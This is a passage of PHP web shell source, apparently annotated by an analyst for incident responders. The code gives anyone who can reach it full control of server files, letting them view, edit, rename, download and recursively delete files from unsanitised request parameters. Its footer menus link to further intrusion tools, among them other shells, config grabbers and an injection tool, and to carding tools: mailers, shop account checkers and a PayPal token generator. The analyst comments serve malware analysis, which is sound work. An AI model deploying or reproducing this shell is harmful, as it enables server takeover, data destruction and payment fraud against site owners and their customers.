  4191. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4192. <input type='submit' name='new_save_file' value='Submit'>
  4193. </form>";
  4194. } elseif($_GET['act'] == 'newfolder') {
  4195. if($_POST['new_save_folder']) {
  4196. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4197. if(!mkdir($new_folder)) {
  4198. $act = "<font color=red>permission denied</font>";
  4199. } else {
  4200. $act = "<script>window.location='?dir=".$dir."';</script>";
  4201. }
  4202. }
  4203. echo $act;
  4204. echo "<form method='post'>
  4205. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4206. <input type='submit' name='new_save_folder' value='Submit'>
  4207. </form>";
  4208. } elseif($_GET['act'] == 'rename_dir') {
  4209. if($_POST['dir_rename']) {
  4210. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4211. if($dir_rename) {
  4212. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4213. } else {
  4214. $act = "<font color=red>permission denied</font>";
  4215. }
  4216. echo "".$act."<br>";
  4217. }
  4218. echo "<form method='post'>
  4219. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4220. <input type='submit' name='dir_rename' value='rename'>
  4221. </form>";
  4222. } elseif($_GET['act'] == 'delete_dir') {
  /**
   * Recursively removes a file or directory tree.
   *
   * A directory is emptied entry by entry ("." and ".." are skipped) and then removed
   * with rmdir(); a regular file is removed with unlink(). The results of the recursive
   * calls are not checked; only the final rmdir()/unlink() result is returned.
   * The function is declared inside the delete_dir branch, so it exists only once that
   * branch has run.
   *
   * Note for incident responders: is_dir() follows symbolic links and realpath() resolves
   * them, so deletions may have reached paths outside the directory named in the request.
   *
   * @param string $path file or directory to remove
   * @return bool result of rmdir()/unlink(), or false when $path is neither a directory nor a file
   */
  4223. function Delete($path)
  4224. {
  4225. if (is_dir($path) === true)
  4226. {
  4227. $files = array_diff(scandir($path), array('.', '..'));
  4228. foreach ($files as $file)
  4229. {
  4230. Delete(realpath($path) . '/' . $file);
  4231. }
  4232. return rmdir($path);
  4233. }
  4234. else if (is_file($path) === true)
  4235. {
  4236. return unlink($path);
  4237. }
  4238. return false;
  4239. }
  4240. $delete_dir = Delete($dir);
  4241. if($delete_dir) {
  4242. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4243. } else {
  4244. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4245. }
  4246. echo $act;
  4247. } elseif($_GET['act'] == 'view') {
  4248. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4249. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4250. } elseif($_GET['act'] == 'edit') {
  4251. if($_POST['save']) {
  4252. $save = file_put_contents($_GET['file'], $_POST['src']);
  4253. if($save) {
  4254. $act = "<font color=lime>Saved!</font>";
  4255. } else {
  4256. $act = "<font color=red>permission denied</font>";
  4257. }
  4258. echo "".$act."<br>";
  4259. }
  4260. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4261. echo "<form method='post'>
  4262. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4263. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4264. </form>";
  4265. } elseif($_GET['act'] == 'rename') {
  4266. if($_POST['do_rename']) {
  4267. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4268. if($rename) {
  4269. $act = "<script>window.location='?dir=".$dir."';</script>";
  4270. } else {
  4271. $act = "<font color=red>permission denied</font>";
  4272. }
  4273. echo "".$act."<br>";
  4274. }
  4275. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4276. echo "<form method='post'>
  4277. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4278. <input type='submit' name='do_rename' value='rename'>
  4279. </form>";
  4280. } elseif($_GET['act'] == 'delete') {
  4281. $delete = unlink($_GET['file']);
  4282. if($delete) {
  4283. $act = "<script>window.location='?dir=".$dir."';</script>";
  4284. } else {
  4285. $act = "<font color=red>permission denied</font>";
  4286. }
  4287. echo $act;
  4288. }else {
  4289. if(is_dir($dir) == true) {
  4290. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4291. <tr>
  4292. <th class="th_home"><center>Name</center></th>
  4293. <th class="th_home"><center>Type</center></th>
  4294. <th class="th_home"><center>Size</center></th>
  4295. <th class="th_home"><center>Last Modified</center></th>
  4296. <th class="th_home"><center>Permission</center></th>
  4297. <th class="th_home"><center>Action</center></th>
  4298. </tr>';
  4299. $scandir = scandir($dir);
  4300. foreach($scandir as $dirx) {
  4301. $dtype = filetype("$dir/$dirx");
  4302. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4303. if(!is_dir("$dir/$dirx")) continue;
  4304. if($dirx === '..') {
  4305. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4306. } elseif($dirx === '.') {
  4307. $href = "<a href='?dir=$dir'>$dirx</a>";
  4308. } else {
  4309. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4310. }
  4311. if($dirx === '.' || $dirx === '..') {
  4312. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4313. } else {
  4314. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4315. }
  4316. echo "<tr>";
  4317. echo "<td class='td_home'><img src='"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4318. echo "<td class='td_home'><center>$dtype</center></td>";
  4319. echo "<td class='td_home'><center>-</center></th>";
  4320. echo "<td class='td_home'><center>$dtime</center></td>";
  4321. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4322. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4323. }
  4324. echo "</tr>";
  4325. foreach($scandir as $file) {
  4326. $ftype = filetype("$dir/$file");
  4327. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4328. $size = filesize("$dir/$file")/1024;
  4329. $size = round($size,3);
  4330. if($size > 1024) {
  4331. $size = round($size/1024,2). 'MB';
  4332. } else {
  4333. $size = $size. 'KB';
  4334. }
  4335. if(!is_file("$dir/$file")) continue;
  4336. echo "<tr>";
  4337. echo "<td class='td_home'><img src=''><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4338. echo "<td class='td_home'><center>$ftype</center></td>";
  4339. echo "<td class='td_home'><center>$size</center></td>";
  4340. echo "<td class='td_home'><center>$ftime</center></td>";
  4341. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4342. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4343. }
  4344. echo "</tr></table>";
  4345. } else {
  4346. echo "<font color=red>can't open directory</font>";
  4347. }
  4348. }
  // Analyst note: page footer. Prints two drop-down menus whose options open
  // "$ling=<name>" in a new window when selected; $ling is set outside this section.
  // The option names list further bundled tooling (other shells, config grabbers,
  // mailers, account checkers), which helps scope what else this sample can fetch or
  // run. The <form> and <center> elements opened here are not closed in this string.
  4349. echo "<center><hr><form>
  4350. <select onchange='if (this.value) window.open(this.value);'>
  4351. <option selected='selected' value=''> Tools Creator </option>
  4352. <option value='$ling=wso'>WSO 2.8.1</option>
  4353. <option value='$ling=injection'>1n73ction v3</option>
  4354. <option value='$ling=wk'>WHMCS Killer</option>
  4355. <option value='$ling=adminer'>Adminer</option>
  4356. <option value='$ling=b374k'>b374k Shell</option>
  4357. <option value='$ling=scanner'>Scanner Uploader</option>
  4358. <option value='$ling=b374k323'>b374k 3.2</option>
  4359. <option value='$ling=bh'>BlackHat Shell</option>
  4360. <option value='$ling=vhost'>Grab Config Vhost</option>
  4361. <option value='$ling=grabber'>Grab Config</option>
  4362. <option value='$ling=dhanus'>Dhanush Shell</option>
  4363. <option value='$ling=r57'>R57 Shell</option>
  4364. <option value='$ling=encodedecode'>Encode Decode</option>
  4365. </select>
  4366. <select onchange='if (this.value) window.open(this.value);'>
  4367. <option selected='selected' value=''> Tools Carder </option>
  4368. <option value='$ling=extractor'>DB Email Extractor</option>
  4369. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  4370. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  4371. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  4372. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  4373. <option value='$ling=mailer'>Mailer</option>
  4374. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4375. </select>
  4376. <noscript><input type='submit' value='Submit'></noscript>
  4377. ";
  4378. ?>
  4379. </html>